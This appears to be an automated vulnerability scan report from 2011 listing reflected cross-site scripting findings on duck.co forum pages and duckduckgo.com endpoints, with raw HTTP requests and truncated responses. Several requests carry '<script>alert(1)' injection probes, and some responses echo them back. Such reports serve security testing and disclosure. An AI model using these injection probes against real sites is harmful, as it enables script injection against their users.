| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=BC90837E5 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:27 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/2-28-articles-to |
| GET /topic/2-28-articles-to Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=430E01D27 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:23 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/about-com-s-web |
| GET /topic/about-com-s-web Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=9BD8EB052 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:48:03 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/boolean-operators |
| GET /topic/boolean-operators Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=9951A7995 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:26 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/cached-archived |
| GET /topic/cached-archived Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=D2E90E509 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:27 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/changing-font-text |
| GET /topic/changing-font-text Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=1897635ED Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:31 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/ddg-gg |
| GET /topic/ddg-gg?1f87d"><script>alert(1)< Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=190EE55D6 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:34 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/ddg-in-alternative |
| GET /topic/ddg-in-alternative Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=8643BD559 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:50:22 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/ddg-is-one-of-zoho |
| GET /topic/ddg-is-one-of-zoho Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=5BAAC7BC0 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:22 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/ddg-own-search |
| GET /topic/ddg-own-search Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=48EF8EDDF Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:38 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/ddg-userbar-to |
| GET /topic/ddg-userbar-to Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=7357B4605 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:48:07 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/default-header |
| GET /topic/default-header Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=69C479D21 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:48:57 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/differentiate |
| GET /topic/differentiate Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=C53C477EC Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:23 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/duckduckgo-webs |
| GET /topic/duckduckgo-webs Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=7FEC34344 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:50:38 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/foss-donation |
| GET /topic/foss-donation Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=1BF8E9D44 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:49:50 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/freenet |
| GET /topic/freenet?feb85"><script>alert(1)< Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=BBAD1E4A8 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:34 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/historical-traffic |
| GET /topic/historical-traffic Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=527C52B09 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:48:07 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/how-to-get-similar |
| GET /topic/how-to-get-similar Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=B4E92709C Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:48:56 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/i-did-my-own-way |
| GET /topic/i-did-my-own-way Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=5E2E9786B Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:27 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/i-would-love-it |
| GET /topic/i-would-love-it Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=B8B1D27FE Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:53 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/logging-in-message |
| GET /topic/logging-in-message Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=62DC997A8 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:49 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/maps |
| GET /topic/maps?5c925"><script>alert(1)< Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=52D632939 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:48:36 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/opera-thread |
| GET /topic/opera-thread Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=9B089F9DC Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:33 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/pages-without |
| GET /topic/pages-without Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=65C7D78F2 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:31 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/post-your-ddg |
| GET /topic/post-your-ddg Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=327ADC48E Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:50:38 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/q-html-entities |
| GET /topic/q-html-entities?4fa68"><script>alert(1)< Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=DA8D1BC38 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:42 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/searching-for |
| GET /topic/searching-for Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0AB749E75 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:35 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/spam-site-found |
| GET /topic/spam-site-found?8dfd1"><script>alert(1)< Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0AF19D151 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:48:27 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/userscript-which |
| GET /topic/userscript-which Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=E821B1976 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:31 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/want-more-visitors |
| GET /topic/want-more-visitors Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=149B5ACDB Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:48:38 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/words-to-live-by |
| GET /topic/words-to-live-by?7bca3"><script>alert(1)< Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=2E7B41A2D Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:39 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/wot-highlighting |
| GET /topic/wot-highlighting?46a5e"><script>alert(1)< Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=7FEBD9395 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:47:42 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /d.js |
| GET /d.js?q=labor%20day&l=us Host: duckduckgo.com Proxy-Connection: keep-alive Referer: http://duckduckgo.com/?q Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:00:25 GMT Content-Type: application/x-javascript; charset=UTF-8 Connection: keep-alive Expires: Tue, 01 Mar 2011 02:00:24 GMT Cache-Control: no-cache Content-Length: 10225 var dnd0fd848;alert(1)/ ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /ie/v1/api/oembed |
| GET /ie/v1/api/oembed?urls Host: duckduckgo.com Proxy-Connection: keep-alive Referer: http://duckduckgo.com/?q Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:04:46 GMT Content-Type: application/json Connection: keep-alive Content-Length: 4284 Etag: "38f10b9f04d62850a2a nreb7f9b0<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /ie/v1/api/oembed |
| GET /ie/v1/api/oembed?urls Host: duckduckgo.com Proxy-Connection: keep-alive Referer: http://duckduckgo.com/?q Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:02:35 GMT Content-Type: application/json Connection: keep-alive Content-Length: 237 Etag: "0d7ad701c72dca3be3b nreb([{"url": "http://www.amazon.com |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /ie/v1/api/oembed |
| GET /ie/v1/api/oembed?urls Host: duckduckgo.com Proxy-Connection: keep-alive Referer: http://duckduckgo.com/?q Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 02:01:10 GMT Content-Type: application/json Connection: keep-alive Content-Length: 4431 Etag: "3c94481d6ac9a4e9cf5 nreb([{"provider_url": "http://www.amazon.com", "description": "Amazon.com: Labor Day: A Novel (P.S.) (9780061843419): Joyce Maynard: Books", "title": "Labor Day: A Novel (P.S.)", "url": "http://www.a ...[SNIP]... <a href=\"http://www.amazon ...[SNIP]... |
| Severity: | High |
